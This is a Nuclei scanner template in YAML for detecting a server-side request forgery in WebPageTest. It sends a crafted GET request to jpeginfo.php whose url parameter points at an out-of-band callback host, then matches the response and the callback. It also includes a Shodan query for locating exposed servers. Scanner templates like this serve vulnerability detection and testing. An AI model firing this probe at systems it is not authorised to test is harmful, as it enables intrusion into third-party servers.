id: webpagetest-ssrf

info:
  name: Web Page Test - Server Side Request Forgery (SSRF)
  author: pdteam
  severity: high
  reference:
    - https://thinkloveshare.com/hacking/preauth_remote_code_execution_web_page_test/
    - https://github.com/WPO-Foundation/webpagetest
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"WebPageTest"
  tags: ssrf,webpagetest,oast

http:
  - method: GET
    path:
      - "{{BaseURL}}/jpeginfo/jpeginfo.php?url={{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "File is not a JPEG Image"

      - type: word
        part: interactsh_protocol
        words:
          - "http"

# digest: 4a0a00473045022100ea8991cb05617923e77310e2bdd953c0dc2457c6e437ef2370cf965cd91a055b022075f0a487e1dd3af5c962abb4d746bda5fe89b8e74b3c2d73dfec6ca7d79b8f14:922c64590222798bb761d5b6d8e72950
